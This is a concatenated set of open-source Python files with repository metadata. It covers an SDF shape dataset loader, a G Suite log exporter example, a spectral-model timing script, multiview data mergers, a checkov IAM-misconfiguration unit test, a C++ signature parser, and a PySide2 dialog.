os.path.join(data_source, 'SurfaceSamples', os.path.join(dataset, class_name, instance_name + ".ply"))):
continue
npzfiles += [instance_filename]
print(f"Found {len(npzfiles)} files.")
return npzfiles
class NoMeshFileError(RuntimeError):
"""Raised when a mesh file is not found in a shape directory"""
pass
class MultipleMeshFileError(RuntimeError):
""""Raised when a there a multiple mesh files in a shape directory"""
pass
def find_mesh_in_directory(shape_dir):
mesh_filenames = list(glob.iglob(shape_dir + "/**/*.obj")) + list(
glob.iglob(shape_dir + "/*.obj")
)
if len(mesh_filenames) == 0:
raise NoMeshFileError()
elif len(mesh_filenames) > 1:
raise MultipleMeshFileError()
return mesh_filenames[0]
def remove_nans(tensor):
tensor_nan = torch.isnan(tensor[:, 3])
return tensor[~tensor_nan, :]
def load_levelset(levelset_filename, normalization_filename):
normalization_params = np.load(normalization_filename)
unormalized = torch.FloatTensor(trimesh.load(levelset_filename).vertices)
levelset_tensor = (unormalized + normalization_params['offset']) * normalization_params['scale']# Old version, works
# levelset_tensor = unormalized * normalization_params['scale'] + normalization_params['offset']
return levelset_tensor
def load_partial(partial_filename, normalization_filename):
normalization_params = np.load(normalization_filename)
unormalized = torch.FloatTensor(trimesh.load(partial_filename).vertices)
partial_tensor = (unormalized + normalization_params['offset']) * normalization_params['scale']
return partial_tensor
def read_sdf_samples_into_ram(sdf_filename, levelset_filename, partial_filename, normalization_params_filename, context_mode):
sdf_npz = np.load(sdf_filename, allow_pickle=True)
pos_tensor = remove_nans(torch.from_numpy(sdf_npz["pos"]))
neg_tensor = remove_nans(torch.from_numpy(sdf_npz["neg"]))
levelset_tensor = torch.zeros((1,))
partial_tensor = torch.zeros((1,))
if context_mode == 'levelset':
levelset_tensor = load_levelset(levelset_filename, normalization_params_filename)
if context_mode == 'partial':
partial_tensor = load_partial(partial_filename, normalization_params_filename)
return [pos_tensor, neg_tensor, levelset_tensor, partial_tensor]
def unpack_sdf_samples(sdf_filename, levelset_filename, partial_filename, normalization_filename, subsampleSDF, subsampleLevelset, context_mode):
npz = np.load(sdf_filename)
pos_tensor = remove_nans(torch.from_numpy(npz["pos"]))
neg_tensor = remove_nans(torch.from_numpy(npz["neg"]))
# split the sample into half
half = int(subsampleSDF / 2)
random_pos = (torch.rand(half) * pos_tensor.shape[0]).long()
random_neg = (torch.rand(half) * neg_tensor.shape[0]).long()
sample_pos = torch.index_select(pos_tensor, 0, random_pos)
sample_neg = torch.index_select(neg_tensor, 0, random_neg)
samples = torch.cat([sample_pos, sample_neg], 0)
if context_mode == 'levelset':
levelset_tensor = load_levelset(levelset_filename, normalization_filename)
context_idcs = np.random.choice(levelset_tensor.shape[0], subsampleLevelset, replace=False)
levelset_points = levelset_tensor[context_idcs]
elif context_mode == 'partial':
levelset_tensor = load_partial(partial_filename, normalization_filename)
context_idcs = np.random.choice(levelset_tensor.shape[0], subsampleLevelset, replace=True)
levelset_points = levelset_tensor[context_idcs]
else:
levelset_points = torch.zeros((1,))
return {'sdf': samples, 'levelset': levelset_points}
def unpack_sdf_samples_from_ram(data, subsampleSDF, subsampleLevelset):
pos_tensor = data[0]
neg_tensor = data[1]
levelset_tensor = data[2]
partial_tensor = data[3]
levelset_points = levelset_tensor
# Subsample Levelset
context_idcs = np.random.choice(levelset_tensor.shape[0], subsampleLevelset, replace=True)
levelset_points = levelset_tensor[context_idcs]
if not subsampleSDF:
subsampleSDF = pos_tensor.shape[0]
# split the sample into half
half = int(subsampleSDF / 2)
random_pos = (torch.rand(half) * pos_tensor.shape[0]).long()
random_neg = (torch.rand(half) * neg_tensor.shape[0]).long()
sample_pos = torch.index_select(pos_tensor, 0, random_pos)
sample_neg = torch.index_select(neg_tensor, 0, random_neg)
samples = torch.cat([sample_pos, sample_neg], 0)
#return samples
return {'sdf': samples, 'levelset': levelset_points, 'partial': partial_tensor}
class LevelsetDataset(torch.utils.data.Dataset):
def __init__(
self,
data_source,
split,
subsampleSDF,
subsampleLevelset,
context_mode,
load_ram=False,
print_filename=False,
num_files=1000000,
):
self.subsampleSDF = subsampleSDF
self.subsampleLevelset = subsampleLevelset
self.context_mode = context_mode
self.data_source = data_source
self.npyfiles = get_instance_filenames(data_source, split)
logging.debug(
"using "
+ str(len(self.npyfiles))
+ " shapes from data source "
+ data_source
)
def __len__(self):
return len(self.npyfiles)
def get_filenames(self, new_idx):
instance_name = os.path.splitext(self.npyfiles[new_idx])[0]#.split('/')[-1]
sdf_filename = os.path.join(self.data_source, 'SdfSamples', self.npyfiles[new_idx])
levelset_filename = os.path.splitext(os.path.join(self.data_source, 'SurfaceSamples', self.npyfiles[new_idx]))[0] + '.ply'
normalization_filename = os.path.join(self.data_source, 'NormalizationParameters', self.npyfiles[new_idx])
partial_filename = os.path.join('/home/ericryanchan/depth_maps', instance_name, 'world_coords.ply')
return sdf_filename, levelset_filename, partial_filename, normalization_filename
def __getitem__(self, idx):
new_idx = idx
while True:
sdf_filename, levelset_filename, partial_filename, normalization_filename = self.get_filenames(new_idx)
try:
return unpack_sdf_samples(sdf_filename, levelset_filename, partial_filename, normalization_filename, self.subsampleSDF, self.subsampleLevelset, self.context_mode), new_idx
except (FileNotFoundError, ValueError) as e:
#print(e)
new_idx = (new_idx + 1) % len(self)
def meta_split(sdf_tensor, levelset_tensor, context_mode):
if context_mode == 'levelset':
xyz = sdf_tensor[:, :, 0:3]
sdf_gt = sdf_tensor[:, :, 3:4]
# Use levelset points, 0's as context; full sdf data as test
meta_data = {'context':(levelset_tensor, torch.zeros(levelset_tensor.shape[0], levelset_tensor.shape[1], 1)),
'query':(xyz, sdf_gt)}
return meta_data
elif context_mode == 'dense':
######## Subsample half of the points as context
context_inputs = []
context_targets = []
test_inputs = []
test_targets = []
batch_size = sdf_tensor.shape[0]
for b in range(batch_size):
idx = torch.randperm(sdf_tensor[b].shape[0]) # shuffle along points dimension
sdf_tensor[b] = sdf_tensor[b][idx]
context_length = sdf_tensor[b].shape[0]//2
context_inputs.append(sdf_tensor[b][:context_length, :3])
context_targets.append(sdf_tensor[b][:context_length, 3:])
test_inputs.append(sdf_tensor[b][context_length:, :3])
test_targets.append(sdf_tensor[b][context_length:, 3:])
context_inputs = torch.stack(context_inputs, dim=0)
context_targets = torch.stack(context_targets, dim=0)
test_inputs = torch.stack(test_inputs, dim=0)
test_targets = torch.stack(test_targets, dim=0)
meta_data = {'context':(context_inputs, context_targets),
'query':(sdf_tensor[:,:,:3], sdf_tensor[:,:,3:])}
return meta_data
#########################
elif context_mode == 'partial': # Same as levelset right now, just loading different points
xyz = sdf_tensor[:, :, 0:3]
sdf_gt = sdf_tensor[:, :, 3:4]
# Use partial points, 0's as context; full sdf data as test
meta_data = {'context':(levelset_tensor, torch.zeros(levelset_tensor.shape[0], levelset_tensor.shape[1], 1)),
'query':(xyz, sdf_gt)}
return meta_data
else:
raise NotImplementedError
def create_samples(N=256, max_batch = 32768, offset=None, scale=None):
# NOTE: the voxel_origin is actually the (bottom, left, down) corner, not the middle
voxel_origin = [-1, -1, -1]
voxel_size = 2.0 / (N - 1)
overall_index = torch.arange(0, N ** 3, 1, out=torch.LongTensor())
samples = torch.zeros(N ** 3, 4)
# transform first 3 columns
# to be the x, y, z index
samples[:, 2] = overall_index % N
samples[:, 1] = (overall_index.float() / N) % N
samples[:, 0] = ((overall_index.float() / N) / N) % N
# transform first 3 columns
# to be the x, y, z coordinate
samples[:, 0] = (samples[:, 0] * voxel_size) + voxel_origin[2]
samples[:, 1] = (samples[:, 1] * voxel_size) + voxel_origin[1]
samples[:, 2] = (samples[:, 2] * voxel_size) + voxel_origin[0]
num_samples = N ** 3
samples.requires_grad = False
return samples
def convert_sdf_samples_to_ply(
pytorch_3d_sdf_tensor,
voxel_grid_origin,
voxel_size,
ply_filename_out,
offset=None,
scale=None,
level=0.0
):
"""
Convert sdf samples to .ply
:param pytorch_3d_sdf_tensor: a torch.FloatTensor of shape (n,n,n)
:voxel_grid_origin: a list of three floats: the bottom, left, down origin of the voxel grid
:voxel_size: float, the size of the voxels
:ply_filename_out: string, path of the filename to save to
This function adapted from: https://github.com/RobotLocomotion/spartan
"""
start_time = time.time()
numpy_3d_sdf_tensor = pytorch_3d_sdf_tensor.numpy()
verts, faces, normals, values = np.zeros((0, 3)), np.zeros((0, 3)), np.zeros((0, 3)), np.zeros(0)
try:
verts, faces, normals, values = skimage.measure.marching_cubes_lewiner(
numpy_3d_sdf_tensor, level=level, spacing=[voxel_size] * 3
)
except:
pass
# transform from voxel coordinates to camera coordinates
# note x and y are flipped in the output of marching_cubes
mesh_points = np.zeros_like(verts)
mesh_points[:, 0] = voxel_grid_origin[0] + verts[:, 0]
mesh_points[:, 1] = voxel_grid_origin[1] + verts[:, 1]
mesh_points[:, 2] = voxel_grid_origin[2] + verts[:, 2]
# apply additional offset and scale
if scale is not None:
mesh_points = mesh_points / scale
if offset is not None:
mesh_points = mesh_points - offset
# try writing to the ply file
num_verts = verts.shape[0]
num_faces = faces.shape[0]
verts_tuple = np.zeros((num_verts,), dtype=[("x", "f4"), ("y", "f4"), ("z", "f4")])
for i in range(0, num_verts):
verts_tuple[i] = tuple(mesh_points[i, :])
faces_building = []
for i in range(0, num_faces):
faces_building.append(((faces[i, :].tolist(),)))
faces_tuple = np.array(faces_building, dtype=[("vertex_indices", "i4", (3,))])
el_verts = plyfile.PlyElement.describe(verts_tuple, "vertex")
el_faces = plyfile.PlyElement.describe(faces_tuple, "face")
ply_data = plyfile.PlyData([el_verts, el_faces])
ply_data.write(ply_filename_out)
|
70d765e66e076ba687d147dfa17a3e7f325085a1
|
61004e474b7b2ad0071c16766f0f7874f04f9466
|
/tools/gsuite-exporter/examples/sync_reports.py
|
8568de97d5eee451fd6fd3c4f0c5c9458a14ea9e
|
[
"Apache-2.0"
] |
permissive
|
GoogleCloudPlatform/professional-services
|
eb79751efae765a8c691a745e520f44f51bd715c
|
0f51121b945bd74c7f667e74e8861fceda87565c
|
refs/heads/main
| 2023-09-05T02:57:33.328973
| 2023-08-30T14:40:30
| 2023-08-30T14:40:30
| 91,730,359
| 2,626
| 1,381
|
Apache-2.0
| 2023-09-14T20:13:42
| 2017-05-18T19:29:27
|
Python
|
UTF-8
|
Python
| false
| false
| 1,001
|
py
|
sync_reports.py
|
# Copyright 2018 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from gsuite_exporter.cli import sync_all
if __name__ == '__main__':
sync_all(
admin_user='<gsuite_admin>@<domain>',
api='reports_v1',
applications=['login', 'admin', 'drive', 'mobile', 'token'],
project_id='<logging_project_id>',
exporter_cls='stackdriver_exporter.StackdriverExporter',
credentials_path=os.environ['GOOGLE_APPLICATION_CREDENTIALS']
)
|
1eca13594e856349816f1e2dcac72b906913deb6
|
73768455b5b4380b37875f7c6588ab989e907dc6
|
/demo/timing.py
|
a130c4db4cdd9711c8b5e318831829da390bb757
|
[
"MIT"
] |
permissive
|
bd-j/prospector
|
5548d4d09d50e5aa5824194d048b698842ee3872
|
5c0255ae828c2b501e66747dcae963fec5e81a8d
|
refs/heads/main
| 2023-09-01T00:26:38.316920
| 2023-08-28T15:41:27
| 2023-08-28T15:41:27
| 10,490,445
| 139
| 73
|
MIT
| 2023-08-04T13:48:12
| 2013-06-04T22:47:00
|
Python
|
UTF-8
|
Python
| false
| false
| 3,522
|
py
|
timing.py
|
from copy import deepcopy
import timeit, time, sys
import numpy as np
import fsps
from prospect.sources import FastStepBasis, CSPBasis
sps = fsps.StellarPopulation(zcontinuous=1)
libs = [l.upper() for l in sps.libraries]
def get_model(sps, **kwargs):
try:
# For SSPBasis derived objects
sps.update(**kwargs)
except(AttributeError):
# For StellarPopulation and CSPBasis objects
for k, v in kwargs.iteritems():
try:
sps.params[k] = v
except:
pass
out = sps.get_spectrum(tage=sps.params['tage'])
return out
def call_duration(sps, ntry, **params):
# build cached SSPs without getting charged for the time.
junk = [get_model(sps, logzsol=[z], **params) for z in np.linspace(-1, 0, 12)]
#print('done_setup')
ts = time.time()
for i in range(ntry):
_ = get_model(sps, logzsol=[np.random.uniform(-0.8, -0.2)], **params)
dur = time.time() - ts
return dur / ntry
def make_agebins(nbin=5, minage=7.0, **extras):
tuniv = 13.7e9
allages = np.linspace(minage, np.log10(tuniv), nbin)
allages = np.insert(allages, 0, 0.)
agebins = np.array([allages[:-1], allages[1:]]).T
return agebins
if __name__ == "__main__":
step_params = {'agebins':[[]],
'mass': [],
'tage': np.array([13.7]),
'pmetals': np.array([-99])
}
csp_params = {'tage': np.array([10.0]),
'sfh': np.array([4.0]),
'mass': np.array([1.0]),
'pmetals': np.array([-99])
}
w = ['WITHOUT', 'WITH']
ntry = 100
zlist = [1, 2]
nlist = [False, True]
print("Using {} isochrones and {} spectra.\nAsking for single ages.".format(*libs))
# FSPS
string = "StellarPopulation takes {:7.5f}s per call {} nebular emission and zcontinuous={}."
params = deepcopy(csp_params)
for zcont in zlist:
print("\n")
for neb in nlist:
sps = fsps.StellarPopulation(zcontinuous=zcont)
dur = call_duration(sps, ntry, add_neb_emission=[neb], **params)
print(string.format(dur, w[int(neb)], zcont))
# CSP
string = "CSPBasis takes {:7.5f}s per call {} nebular emission and zcontinuous={}."
params = deepcopy(csp_params)
for zcont in zlist:
print("\n")
for neb in nlist:
sps = CSPBasis(zcontinuous=zcont)
dur = call_duration(sps, ntry, add_neb_emission=[neb], **params)
print(string.format(dur, w[int(neb)], zcont))
# Step SFH
nbin = 10
params = deepcopy(step_params)
params['agebins'] = make_agebins(nbin)
params['mass'] = np.ones(nbin) * 1.0
string = "FastStepBasis ({} bins) takes {:7.5f}s per call {} nebular emission and zcontinuous={}."
for zcont in zlist:
print("\n")
for neb in nlist:
sps = FastStepBasis(zcontinuous=zcont)
dur = call_duration(sps, ntry, add_neb_emission=[neb], **params)
#print(sps.params, sps.ssp.params['add_neb_emission'])
print(string.format(nbin, dur, w[int(neb)], zcont))
# sys.exit()
# Now time calls for random Z (which always causes dirtiness=1)
#setup = "from __main__ import test; import numpy as np"
#call = "out=get_model(sps, logzsol=[np.random.uniform(-1, 0)], **params)"
#dur = timeit.timeit(call, setup=setup, number=100)
|
ed1a961247c63899c3c7baeab4371e5e88a55863
|
2b8f195b10e8e12db1252318922668cb432ea8ab
|
/mvlearn/compose/merge.py
|
b01e9499f2c38630bb866f6f7cad50dd12d8634a
|
[
"MIT"
] |
permissive
|
mvlearn/mvlearn
|
70fba0fc52e1467101adadf46cf61e7076838c2f
|
003dccea563926fca5d957f5bbf39c1494acfe94
|
refs/heads/main
| 2023-04-18T15:47:53.716354
| 2022-04-05T22:17:18
| 2022-04-05T22:17:18
| 206,838,300
| 136
| 17
|
MIT
| 2023-03-08T17:37:59
| 2019-09-06T16:56:51
|
Python
|
UTF-8
|
Python
| false
| false
| 7,359
|
py
|
merge.py
|
"""Merging utilities."""
# Authors: Pierre Ablin
#
# License: MIT
import numpy as np
from abc import abstractmethod
from sklearn.base import TransformerMixin
from sklearn.utils.validation import check_is_fitted
from ..utils.utils import check_Xs
class BaseMerger(TransformerMixin):
"""A base class for merging multiview datasets into single view datasets.
The .transform function should return a single dataset.
Parameters
----------
Attributes
----------
See Also
--------
"""
def __init__(self):
pass # pragma: no cover
@abstractmethod
def fit(self, Xs, y=None):
r"""Fit model to multiview data.
Parameters
----------
Xs: list of array-likes
- Xs shape: (n_views,)
- Xs[i] shape: (n_samples, n_features_i)
y : array, shape (n_samples,), optional
Returns
-------
self: returns an instance of self.
"""
return self # pragma: no cover
@abstractmethod
def transform(self, Xs, y=None):
r"""Merge multiview data into a single dataset
Parameters
----------
Xs: list of array-likes
- Xs shape: (n_views,)
- Xs[i] shape: (n_samples, n_features_i)
y : array, shape (n_samples,), optional
Returns
-------
X_transformed : numpy.ndarray of shape (n_samples, n_features)
The singleview output
"""
pass # pragma: no cover
def fit_transform(self, Xs, y=None):
r"""Fit to the data and merge
Parameters
----------
Xs : list of array-likes or numpy.ndarray
- Xs length: n_views
- Xs[i] shape: (n_samples, n_features_i)
y : array, shape (n_samples,), optional
Returns
-------
X_transformed : numpy.ndarray of shape (n_samples, n_features)
The singleview output
"""
return self.fit(Xs, y).transform(Xs)
@abstractmethod
def inverse_transform(self, X):
r"""Take a single view dataset and split it into multiple views.
Parameters
----------
X : numpy.ndarray, shape (n_total_features, n_samples)
The input dataset
Returns
-------
Xs : list of numpy.ndarray
- Xs length: n_views
- Xs[i] shape: (n_samples, n_features_i)
"""
pass # pragma: no cover
class ConcatMerger(BaseMerger):
r"""A transformer that stacks features of multiview datasets.
Take a multiview dataset and transform it in a single view dataset
by stacking features.
Attributes
----------
n_features_ : list of ints
The number of features in each view of the input dataset
n_total_features_ : int
The number of features in the dataset, equal to the sum of n_features_
n_views_ : int
The number of views in the dataset
See Also
--------
AverageMerger
"""
def __init__(self):
pass
def fit(self, Xs, y=None):
r"""Fit to the data.
Stores the number of features in each view
Parameters
----------
Xs : list of array-likes or numpy.ndarray
- Xs length: n_views
- Xs[i] shape: (n_samples, n_features_i)
y
Ignored
Returns
-------
self : object
Transformer instance.
"""
Xs, n_views, n_samples, n_features = check_Xs(
Xs, return_dimensions=True
)
self.n_features_ = n_features
self.n_total_features_ = sum(self.n_features_)
self.n_views_ = n_views
return self
def transform(self, Xs, y=None):
r"""Merge the data by stacking its features.
The multiple views are transformed into a single view dataset by
stacking (i.e. concatenating) the features.
Parameters
----------
Xs : list of array-likes or numpy.ndarray
- Xs length: n_views
- Xs[i] shape: (n_samples, n_features_i)
y
Ignored
Returns
-------
X_transformed : numpy.ndarray of shape (n_total_features, n_samples)
The stacked data, containing all the stacked features.
"""
Xs = check_Xs(Xs)
return np.hstack(Xs)
def inverse_transform(self, X):
r"""Take a single view dataset and split it into multiple views.
The input dimension must match the fitted dimension of the multiview
dataset.
Parameters
----------
X : numpy.ndarray, shape (n_total_features, n_samples)
The input dataset
Returns
-------
Xs : list of numpy.ndarray
- Xs length: n_views
- Xs[i] shape: (n_samples, n_features_i)
The multiview dataset obtained by splitting features of X
"""
check_is_fitted(self)
n_feature = X.shape[1]
if n_feature != self.n_total_features_:
raise ValueError(
"The number of features in the input array ({}) does not match"
" the total number of features in the multiview dataset"
" ({})".format(n_feature, self.n_total_features_)
)
return np.split(X, np.cumsum(self.n_features_)[:-1], axis=1)
class AverageMerger(BaseMerger):
r"""A transformer that computes the mean of multiview datasets
Take a multiview dataset and transform it in a single view dataset
by averaging across views
Attributes
----------
n_feature_ : list of ints
The number of feature in each view of the input dataset
Must be the same for each dataset.
n_views_ : int
The number of views in the dataset
See Also
--------
ConcatMerger
"""
def __init__(self):
pass
def fit(self, Xs, y=None):
r"""Fit to the data.
Stores the number of features in each view, and checks that
each view has the same number of features.
Parameters
----------
Xs : list of array-likes or numpy.ndarray
- Xs length: n_views
- Xs[i] shape: (n_samples, n_features_i)
y
Ignored
Returns
-------
self : object
Transformer instance.
"""
Xs = check_Xs(Xs)
n_features_ = [X.shape[1] for X in Xs]
if len(set(n_features_)) > 1:
raise ValueError(
"The number of features in each dataset should be the same."
)
self.n_feature_ = n_features_[0]
self.n_views_ = len(n_features_)
return self
def transform(self, Xs, y=None):
r"""Merge the views by averaging
Transform the multiview dataset into a single view by averaging
the views
Parameters
----------
Xs : list of array-likes or numpy.ndarray
- Xs length: n_views
- Xs[i] shape: (n_samples, n_features_i)
y
Ignored
Returns
-------
X_transformed : numpy.ndarray of shape (n_total_features, n_samples)
The average of the views.
"""
Xs = check_Xs(Xs)
return np.mean(Xs, axis=0)
|
b1d46011f78b36fd71f4f1bdb718bd75053db64a
|
45e376ae66b78b17788b1d3575b334b2cb1d0b1c
|
/tests/terraform/checks/resource/gcp/test_GoogleProjectAdminServiceAccount.py
|
37fd4a8a48bd986aa7b83832e8af4673cb9b5635
|
[
"Apache-2.0"
] |
permissive
|
bridgecrewio/checkov
|
aeb8febed2ed90e61d5755f8f9d80b125362644d
|
e64cbd27ffb6f09c2c9f081b45b7a821a3aa1a4d
|
refs/heads/main
| 2023-08-31T06:57:21.990147
| 2023-08-30T23:01:47
| 2023-08-30T23:01:47
| 224,386,599
| 5,929
| 1,056
|
Apache-2.0
| 2023-09-14T20:10:23
| 2019-11-27T08:55:14
|
Python
|
UTF-8
|
Python
| false
| false
| 1,305
|
py
|
test_GoogleProjectAdminServiceAccount.py
|
import unittest
import hcl2
from checkov.terraform.checks.resource.gcp.GoogleProjectAdminServiceAccount import check
from checkov.common.models.enums import CheckResult
class TestGoogleComputeDiskEncryption(unittest.TestCase):
def test_failure(self):
hcl_res = hcl2.loads("""
resource "google_project_iam_member" "project" {
project = "your-project-id"
role = "roles/owner"
member = "user:test@example-project.iam.gserviceaccount.com"
}
""")
resource_conf = hcl_res['resource'][0]['google_project_iam_member']['project']
scan_result = check.scan_resource_conf(conf=resource_conf)
self.assertEqual(CheckResult.FAILED, scan_result)
def test_success(self):
hcl_res = hcl2.loads("""
resource "google_project_iam_member" "project" {
project = "your-project-id"
role = "roles/editor"
member = "user:jane@example.com"
}
""")
resource_conf = hcl_res['resource'][0]['google_project_iam_member']['project']
scan_result = check.scan_resource_conf(conf=resource_conf)
self.assertEqual(CheckResult.PASSED, scan_result)
if __name__ == '__main__':
unittest.main()
|
5a7123c8e76a718015e5838254900d3e8188c644
|
fba68a71f9f7d4a2bf49136cdb315fc8258f65e7
|
/kengine/render/polyvox/libs/polyvox/documentation/_extensions/sphinxcontrib/parsing.py
|
a110e0674dc3470f5339f9445691db6997e38b5b
|
[
"MIT",
"BSD-2-Clause"
] |
permissive
|
phisko/kengine
|
a434e66aaa025b95596a6a72c002aba5ba09d75e
|
5a0ad085cdefaffe56e2b049e9772ac7a2d05d15
|
refs/heads/main
| 2023-08-08T05:49:40.621314
| 2023-03-10T10:26:39
| 2023-03-10T12:07:20
| 89,867,048
| 372
| 22
|
MIT
| 2023-03-10T12:07:21
| 2017-04-30T17:50:30
|
C++
|
UTF-8
|
Python
| false
| false
| 6,520
|
py
|
parsing.py
|
#import multiprocessing
import itertools
from pyparsing import Word, Literal, alphas, nums, alphanums, OneOrMore, Optional, SkipTo, ParseException, Group, ZeroOrMore, Suppress, Combine, delimitedList, quotedString, nestedExpr, ParseResults, oneOf
# define punctuation - reuse of expressions helps packratting work better
LPAR,RPAR,LBRACK,RBRACK,COMMA,EQ = map(Literal,"()[],=")
#Qualifier to go in front of type in the argument list (unsigned const int foo)
qualifier = OneOrMore(oneOf('const unsigned typename struct enum'))
def turn_parseresults_to_list(s, loc, toks):
return ParseResults(normalise_templates(toks[0].asList()))
def normalise_templates(toks, isinstance=isinstance, basestring=basestring):
s_list = ['<']
s_list_append = s_list.append #lookup append func once, instead of many times
for tok in toks:
if isinstance(tok, basestring): #See if it's a string
s_list_append(' ' + tok)
else:
#If it's not a string
s_list_append(normalise_templates(tok))
s_list_append(' >')
return ''.join(s_list)
#Skip pairs of brackets.
angle_bracket_pair = nestedExpr(opener='<',closer='>').setParseAction(turn_parseresults_to_list)
#TODO Fix for nesting brackets
parentheses_pair = LPAR + SkipTo(RPAR) + RPAR
square_bracket_pair = LBRACK + SkipTo(RBRACK) + RBRACK
#The raw type of the input, i.e. 'int' in (unsigned const int * foo)
#TODO I guess this should be a delimited list (by '::') of name and angle brackets
input_type = Combine(Word(alphanums + ':_') + Optional(angle_bracket_pair + Optional(Word(alphanums + ':_'))))
#A number. e.g. -1, 3.6 or 5
number = Word('-.' + nums)
#The name of the argument. We will ignore this but it must be matched anyway.
input_name = OneOrMore(Word(alphanums + '_') | angle_bracket_pair | parentheses_pair | square_bracket_pair)
#Grab the '&', '*' or '**' type bit in (const QString & foo, int ** bar)
pointer_or_reference = oneOf('* &')
#The '=QString()' or '=false' bit in (int foo = 4, bool bar = false)
default_value = Literal('=') + OneOrMore(number | quotedString | input_type | parentheses_pair | angle_bracket_pair | square_bracket_pair | Word('|&^'))
#A combination building up the interesting bit -- the argument type, e.g. 'const QString &', 'int' or 'char*'
argument_type = Optional(qualifier, default='')("qualifier") + \
input_type("input_type") + \
Optional(pointer_or_reference, default='')("pointer_or_reference1") + \
Optional('const')('const_pointer_or_reference') + \
Optional(pointer_or_reference, default='')("pointer_or_reference2")
#Argument + variable name + default
argument = Group(argument_type('argument_type') + Optional(input_name) + Optional(default_value))
#List of arguments in parentheses with an optional 'const' on the end
arglist = LPAR + delimitedList(argument)('arg_list') + Optional(COMMA + '...')('var_args') + RPAR
def normalise(symbol):
"""
Takes a c++ symbol or funtion and splits it into symbol and a normalised argument list.
:Parameters:
symbol : string
A C++ symbol or function definition like ``PolyVox::Volume``, ``Volume::printAll() const``
:return:
a tuple consisting of two strings: ``(qualified function name or symbol, normalised argument list)``
"""
try:
bracket_location = symbol.index('(')
#Split the input string into everything before the opening bracket and everything else
function_name = symbol[:bracket_location]
arglist_input_string = symbol[bracket_location:]
except ValueError:
#If there's no brackets, then there's no function signature. This means the passed in symbol is just a type name
return symbol, ''
#This is a very common signature so we'll make a special case for it. It requires no parsing anyway
if arglist_input_string.startswith('()'):
if arglist_input_string in ('()', '()=0'):
return function_name, arglist_input_string
elif arglist_input_string in ('() const ', '() const', '() const =0'):
return function_name, '() const'
#By now we're left with something like "(blah, blah)", "(blah, blah) const" or "(blah, blah) const =0"
try:
closing_bracket_location = arglist_input_string.rindex(')')
arglist_suffix = arglist_input_string[closing_bracket_location+1:]
arglist_input_string = arglist_input_string[:closing_bracket_location+1]
except ValueError:
#This shouldn't happen.
print('Could not find closing bracket in %s' % arglist_input_string)
raise
try:
result = arglist.parseString(arglist_input_string)
except ParseException as error:
#print symbol
#print pe
return str(error), None
else:
#Will be a list or normalised string arguments
#e.g. ['OBMol&', 'vector< int >&', 'OBBitVec&', 'OBBitVec&', 'int', 'int']
normalised_arg_list = []
#Cycle through all the matched arguments
for arg in result.arg_list:
#Here is where we build up our normalised form of the argument
argument_string_list = ['']
if arg.qualifier:
argument_string_list.append(''.join((arg.qualifier,' ')))
argument_string_list.append(arg.input_type)
#Functions can have a funny combination of *, & and const between the type and the name so build up a list of theose here:
const_pointer_ref_list = []
const_pointer_ref_list.append(arg.pointer_or_reference1)
if arg.const_pointer_or_reference:
const_pointer_ref_list.append(''.join((' ', arg.const_pointer_or_reference, ' ')))
# same here
const_pointer_ref_list.append(arg.pointer_or_reference2)
#And combine them into a single normalised string and add them to the argument list
argument_string_list.extend(const_pointer_ref_list)
#Finally we join our argument string and add it to our list
normalised_arg_list.append(''.join(argument_string_list))
#If the function contains a variable number of arguments (int foo, ...) then add them on.
if result.var_args:
normalised_arg_list.append('...')
#Combine all the arguments and put parentheses around it
normalised_arg_list_string = ''.join(['(', ', '.join(normalised_arg_list), ')'])
#Add a const onto the end
if 'const' in arglist_suffix:
normalised_arg_list_string += ' const'
return function_name, normalised_arg_list_string
#TODO Maybe this should raise an exception?
return None
def normalise_list(list_of_symbols):
#normalise_pool = multiprocessing.Pool(multiprocessing.cpu_count() * 2)
#results = normalise_pool.map(normalise, list_of_symbols)
#normalise_pool.terminate()
results = itertools.imap(normalise, list_of_symbols)
return results
|
c0f18b2c1d20a4d93076f727110a3e501c403825
|
82d65bb050149ee5b3a5995dedf3a233f2dabba4
|
/Eve/tools/pm/ui/ui_pm_add_sequence.py
|
09daafd11fdf1649ba8fa4661a2af43f23b61f96
|
[] |
no_license
|
kiryha/Houdini
|
d2271987b03b4abc739236fd4544a8ff5e1519dd
|
4e58b79e5992dc4fb4e73e44cd2a7e0522420d15
|
refs/heads/master
| 2022-12-14T02:54:38.519360
| 2022-12-06T00:48:31
| 2022-12-06T00:48:31
| 121,566,961
| 668
| 120
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,466
|
py
|
ui_pm_add_sequence.py
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'E:\Eve\Eve\tools\pm\ui\ui_pm_add_sequence.ui',
# licensing of 'E:\Eve\Eve\tools\pm\ui\ui_pm_add_sequence.ui' applies.
#
# Created: Wed Feb 05 11:57:12 2020
# by: pyside2-uic running on PySide2 5.9.0a1.dev1528389443
#
# WARNING! All changes made in this file will be lost!
from PySide2 import QtCore, QtGui, QtWidgets
class Ui_AddSequence(object):
def setupUi(self, AddSequence):
AddSequence.setObjectName("AddSequence")
AddSequence.resize(370, 89)
self.verticalLayout = QtWidgets.QVBoxLayout(AddSequence)
self.verticalLayout.setObjectName("verticalLayout")
self.layoutSequence = QtWidgets.QVBoxLayout()
self.layoutSequence.setObjectName("layoutSequence")
self.verticalLayout.addLayout(self.layoutSequence)
self.btnAddSequence = QtWidgets.QPushButton(AddSequence)
self.btnAddSequence.setMinimumSize(QtCore.QSize(0, 40))
self.btnAddSequence.setObjectName("btnAddSequence")
self.verticalLayout.addWidget(self.btnAddSequence)
self.retranslateUi(AddSequence)
QtCore.QMetaObject.connectSlotsByName(AddSequence)
def retranslateUi(self, AddSequence):
AddSequence.setWindowTitle(QtWidgets.QApplication.translate("AddSequence", "Add Sequence", None, -1))
self.btnAddSequence.setText(QtWidgets.QApplication.translate("AddSequence", "Add Sequence", None, -1))
|
6b506339b41573e31364a09fa7bef5f778fd82a1
|
ea57d267ab31480d8d731b2c095e9da9ad989133
|
/packages/fetchai/protocols/aggregation/aggregation_pb2.py
|
e46ed141e6d6432f55e1d005f9b96ae3bc81c640
|
[
"Apache-2.0"
] |
permissive
|
fetchai/agents-aea
|
6d034f1db6f3beacf31dac2f5a1baaa60c8edb7d
|
